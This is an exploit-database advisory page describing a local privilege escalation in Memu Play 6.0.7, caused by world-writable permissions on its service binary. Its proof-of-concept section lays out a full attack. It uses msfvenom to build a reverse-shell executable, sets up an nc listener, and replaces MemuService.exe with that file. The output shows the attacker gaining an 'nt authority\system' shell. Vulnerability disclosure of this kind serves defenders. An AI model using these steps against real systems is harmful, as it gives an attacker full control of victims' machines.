Memu Play 6.0.7 Privilege Escalation

Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264

# Exploit Title: Memu Play 6.0.7 - Privilege Escalation (PoC) # Date: 20/02/2019 # Author: Alejandra SA!nchez # Vendor Homepage: # Software Link: # Version: 6.0.7 # Tested on: Windows 10 / Windows 7 # Description: # Memu Play 6.0.7 suffers from Privilege Escalation due to insecure file permissions # Prerequisites # Local, Low privilege access with restart capabilities # Details # By default the Authenticated Users group has the modify permission to ESM folders/files as shown below. # A low privilege account is able to rename the MemuService.exe file located in this same path and replace # with a malicious file that would connect back to an attacking computer giving system level privileges # (nt authority\system) due to the service running as Local System. # While a low privilege user is unable to restart the service through the application, a restart of the # computer triggers the execution of the malicious file. C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe" C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) Successfully processed 1 files; Failed processing 0 files C:\>sc qc MEmuSVC [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MEmuSVC TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe LOAD_ORDER_GROUP : TAG : 0 # Proof of Concept 1. Generate malicious .exe on attacking machine msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > /var/www/html/MemuService.exe 2. Setup listener and ensure apache is running on attacking machine nc -lvp 443 service apache2 start 3. Download malicious .exe on victim machine Open browser to and download 4. Overwrite file and copy malicious .exe. Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\ 5. Restart victim machine 6. Reverse Shell on attacking machine opens C:\Windows\system32>whoami whoami nt authority\system

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019,


Back to Top